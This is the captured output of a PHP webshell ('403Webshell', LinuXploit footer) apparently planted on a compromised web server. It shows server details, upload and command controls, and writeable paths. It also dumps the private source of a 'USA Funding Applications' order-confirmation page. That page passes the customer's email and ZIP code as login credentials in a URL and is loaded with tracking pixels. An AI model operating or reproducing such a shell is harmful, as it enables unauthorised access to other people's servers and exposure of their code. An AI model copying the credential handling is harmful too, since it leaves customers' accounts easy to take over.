403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/usafundingapplications.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/usafundingapplications.org/confirm.php
<?php
# confirm.php is displayed when the order was successful. It is called from order.php

$today = date("m-d-Y");


?>
<? include_once("{$_SERVER["DOCUMENT_ROOT"]}/header.php"); ?>

<script type="text/javascript" src="/assets/js/application_verify.js"></script>
<SCRIPT language="JavaScript" type="text/javascript">
	<!-- Yahoo! Inc.
	window.ysm_customData = new Object();
	window.ysm_customData.conversion = "transId=,currency=,amount=24.95";
	var ysm_accountid  = "1MMUEMM3NLM27J9LBBMKVF6BKO0";
	document.write("<SCR" + "IPT language='JavaScript' type='text/javascript' "
	+ "SRC=//" + "srv3.wa.marketingsolutions.yahoo.com" + "/script/ScriptServlet" + "?aid=" + ysm_accountid
	+ "></SCR" + "IPT>");
	// -->
</SCRIPT>
</head>
	<body>
		<div id="size">
		    <div id="logo"></div>
			<div id="text">
				<div id="text_">
					<div style="margin-left: 32px;margin-right:32px;">
						<table cellpadding="2" cellspacing="0" border="0">
                            <tr>
                                <td>
                                    <p class="header">Step 3: Login & Start Applying!</p>
                                    <p>Congratulations! You are on your way to applying for Funding!</p>
                                    <p>Below is your Account Information that will allow you to access the Member's Site right now!</p>
                                    <div class="descriptor_border">
                                    <div class="descriptor_padding">
                                       <center style="padding:10px 0px;">
										<h3 style="padding-right:5px;">Your Credit Card Statement will display:</h3>
										<div style="font-size:24px;">
										<?php
											include_once($_SERVER['DOCUMENT_ROOT'] . "/vx/lib/dinc.php");
											$res = $db->query("SELECT cc_descriptor FROM lc2{$_SITE_CODE}_lc.lc_billing WHERE client_id='".clean($user_id)."' ORDER BY bill_time DESC LIMIT 1");
											echo (empty($res[0]['cc_descriptor'])) ? 'USFUND.ORG 800-337-3471' : $res[0]['cc_descriptor'];
										?>
										</div>
										</center>
                                    </div>
                                    </div>
                            
                                    <p class="header">USA Funding Application User Account Info:</p>
                                    <table cellpadding="0" cellspacing="0" class="questions">
                                        <tr>
                                            <td>
                                                <table border="0" cellpadding="1" cellspacing="1" align="left">
                                                    <tr>
														<td colspan="2" style="padding:0px 5px 20px 5px;">
															<center>
															<h3>To View the Funding Applications and Start Applying,</h3>
															<a href="https://<?= $_SERVER['SERVER_NAME']; ?>/login.php?user=<?= $cc_email; ?>&pass=<?= $cc_zip; ?><?= ($_SESSION['upsell_tracking_version']=='site order after') ? '&upsell=1' : '';?>" style="border-radius:10px;padding:2px 25px;background:#d00305;color:white;font-size:24px;text-decoration:none;" onmouseover="this.style.background = '#aa0000';" onmouseout="this.style.background = '#d00305';">Click Here to Login</a>
															</center>
														</td>
													</tr>
													<tr>
														<td class="bold">Website:</td>
														<td>
															<a href="/login.php"><?= $_SERVER['SERVER_NAME']; ?>/login.php</a>
														</td>
													</tr>
													<tr>
														<td class="bold">Username:</td>
														<td><?= $cc_email; ?></td>
													</tr>
													<tr>
														<td class="bold">Password:</td>
														<td><?= $cc_zip; ?></td>
													</tr>
                                                </table>
                                            </td>
                                        </tr>
                                    </table>
                                    
                                    <p class="header">Personal Information Summary:</p>
                                    <table cellpadding="0" cellspacing="0" class="questions">
                                        <tr>
                                            <td class="q">First Name:</td>
                                            <td class="a"><?= $cc_fname; ?></td>
                                            <td class="q">Last Name:</td>
                                            <td class="a"><?= $cc_lname; ?></td>
                                        </tr>
                                        <tr>
                                            <td class="q">Street Address:</td>
                                            <td class="a"><?= $cc_addr; ?></td>
                                            <td class="q">City:</td>
                                            <td class="a"><?= $cc_city; ?></td>
                                       </tr>
                                        <tr>
                                            <td class="q">State:</td>
                                            <td class="a"><?= $cc_state; ?></td>
                                            <td class="q">Zip:</td>
                                            <td class="a"><?= $cc_zip; ?></td>
                                        </tr>
                                        
                                        <!--
                                        <tr>
                                            <td class="q">Gender:</td>
                                            <td class="a"><?= $app_gender; ?></td>
                                            <td class="q">Age:</td>
                                            <td class="a"><?= $app_age; ?></td>
                                        </tr>
                                        //-->
                                        <tr>
                                            <td class="q">Day Phone:</td>
                                            <td class="a">
                                                <?= $cc_phonearea; ?>-<?= $cc_phoneprefix; ?>-<?= $cc_phoneextension; ?>
                                            </td>
                                            <td colspan="2" class="q">&nbsp;</td>
                                        </tr>
                                    </table>
                                    
                                    <p class="header">Payment Information Summary:</p>
                                    <table cellpadding="0" cellspacing="0" class="questions">
                                        <tr>
                                            <td>
                                                <table border="0" cellpadding="1" cellspacing="1" align="left">
                                                    <tr>
                                                        <td class="q">Credit Card Number:</td>
                                                        <td class="a"><?= $partial_cc_num; ?></td>
                                                        <td class="q">Exp:</td>
                                                        <td class="a"><?= $cc_month; ?> / <?= $cc_year; ?></td>
                                                    </tr>
                                                </table>
                                            </td>
                                         </tr>
                                         <tr>
                                            <td>
                                                <table border="0" cellpadding="1" cellspacing="1" align="left">
                                                    <tr>
                                                        <td class="q">Amount:</td><td class="a">$<?= number_format($_INITIAL_FEE,2); ?></td>
                                                    </tr>
                                                </table>
                                            </td>
                                        </tr>	
                                    </table>	
                                    <p class="header">Customer Service Contact Information</p>
                                    <table cellpadding="0" cellspacing="0" class="questions" align="center">
                                        <tr>
                                            <td>Toll Free Number: 888-261-4837</td>
                                        </tr>
                                        <tr>
                                            <td>Contact Page: <a href="/vx/usa/contact/">usagrantapplications.org/vx/usa/contact/</a></td>
                                        </tr>
                                    </table>
                                    <p>You will have access to the applications and training through the <strong>USA Funding Applications</strong> site 
                                    for the processing fee of $<?= number_format($_INITIAL_FEE,2); ?>. <strong>WE ALSO HAVE A GUARANTEE. <u>If you don't qualify for a Free Funding Program, 
                                    you will be refunded immediately</u>.</strong> Just provide us with the funding application you applied for and the 
                                    response letter from the funder. <strong>Either you qualify for the Free Funding Program or you will have your 
                                    payment refunded to you.</strong></p>
                                </td>
                            </tr>
                        </table>
                    </div>
                    <div id="blinks">
                        <ul>
                            <li><a href="/?tc=<?= $tc; ?><?= $params; ?>">Home</a></li>
                            <li>&nbsp;|&nbsp;</li>
                            <li><a href="/login.php?tc=<?= $tc; ?><?= $params; ?>">Login</a></li>
                            <li>&nbsp;|&nbsp;</li>
                            <li><a href="/terms.php?tc=<?= $tc; ?><?= $params; ?>">Terms</a></li>
                            <li>&nbsp;|&nbsp;</li>
                            <li><a href="/documentation.php?tc=<?= $tc; ?><?= $params; ?>">Documentation</a></li>
                            <li>&nbsp;|&nbsp;</li>
                            <li><a href="/privacy.php?tc=<?= $tc; ?><?= $params; ?>">Privacy Policy</a></li>
                            <li>&nbsp;|&nbsp;</li>
                            <li><a href="/contact.php?tc=<?= $tc; ?><?= $params; ?>">Contact</a></li>
                        </ul>
                    </div>

                                
                    <div id="base"></div>
                </div>
                <img src="https://www.surfcrm.com/tracker/server/tracker.php?spt_saleamount=24.95<?= $trackerparams; ?>">
				<?php if(!empty($cc_lead_id)) { ?>
				<img src="https://www.surfcrm.com/lcapi/FormConfirmationPageTracking.php?site=usafa&lead_id=<?= $cc_lead_id;?>&client_id=<?= $user_id;?>&form_url=<?= urlencode('/confirm.php');?>" />
				<?php } ?>

<?php /*
<!-- Begin MIVA Ad Analyzer Code -->
<script type="text/javascript">
<!--
var mv_cnv = 1;
var mv_aid = 207978;
var mv_uid = '858a4096-dde2-41d9-afeb-541b84512275';
if (location.href.substr(0,5) == "https")
{var secure = "s"}
else
{var secure = ""}
var mv_cb = Math.random() + "";
document.write('<img src="http'+secure+'://mv.bidsystem.com/ppc/sendtracker.aspx?c='+mv_aid+'&conversion='+mv_cnv+'&w=p3p&cb='+mv_cb+'&u='+mv_uid+'" border="0" hspace="0" vspace="0">');
// -->
</script>
<!-- End MIVA Ad Analyzer Code -->

<!-- Begin MIVA Ad Analyzer Code -->
<script type="text/javascript">
<!--
var mv_cnv = 0;
var mv_aid = 207978;
var mv_uid = '858a4096-dde2-41d9-afeb-541b84512275';
if (location.href.substr(0,5) == "https")
{var secure = "s"}
else
{var secure = ""}
var mv_cb = Math.random() + "";
document.write('<img src="http'+secure+'://mv.bidsystem.com/ppc/sendtracker.aspx?c='+mv_aid+'&conversion='+mv_cnv+'&w=p3p&cb='+mv_cb+'&u='+mv_uid+'" border="0" hspace="0" vspace="0">');
// -->
</script>
<!-- End MIVA Ad Analyzer Code -->

<!-- Google Code for USAFA Sales Conversion Page -->
<script type="text/javascript">
<!--
var google_conversion_id = 1033569693;
var google_conversion_language = "en_US";
var google_conversion_format = "1";
var google_conversion_color = "ffffff";
var google_conversion_label = "khpICMP0ngEQnYvs7AM";
if (24.95) {
var google_conversion_value = 24.95;
}
//-->
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1033569693/?value=24.95&amp;label=khpICMP0ngEQnYvs7AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<SCRIPT>
 microsoft_adcenterconversion_domainid = 565143;
 microsoft_adcenterconversion_cp = 5050;
</SCRIPT>
<SCRIPT SRC="https://0.r.msn.com/scripts/microsoft_adcenterconversion.js"></SCRIPT>
<NOSCRIPT><IMG width=1 height=1 SRC="https://565143.r.msn.com/?type=1&cp=1"/></NOSCRIPT><a href="http://advertising.msn.com/MSNadCenter/LearningCenter/adtracker.asp" target="_blank">::adCenter::</a>
<? if($special_order == '1') { ?>
	<script language="javascript" src="/vsa/sale.php?cid=2"></script>
<? } ?>

		<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-8424359-1");
pageTracker._trackPageview('confirm.php');
} catch(err) {}</script>

<!-- Global site tag (gtag.js) - Google AdWords: 1033569693 -->
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-1033569693"></script>
<script>
 window.dataLayer = window.dataLayer || [];
 function gtag(){dataLayer.push(arguments);}
 gtag('js', new Date());

 gtag('config', 'AW-1033569693');
</script>
<!-- Event snippet for USAFA Sales conversion page -->
<script>
 gtag('event', 'conversion', {
     'send_to': 'AW-1033569693/khpICMP0ngEQnYvs7AM',
     'value': 1.0,
     'currency': 'USD',
     'transaction_id': ''
 });
</script>
*/?>

<!-- Global site tag (gtag.js) - Google AdWords: 1033569693 -->
		<script async src="https://www.googletagmanager.com/gtag/js?id=AW-1033569693"></script>
		<script>
		  window.dataLayer = window.dataLayer || [];
		  function gtag(){dataLayer.push(arguments);}
		  gtag('js', new Date());

		  gtag('config', 'AW-1033569693'); //adwords
		  gtag('config', 'UA-8424359-1'); //analytics
		</script>

</body>
</html>


Youez - 2016 - github.com/yon3zu
LinuXploit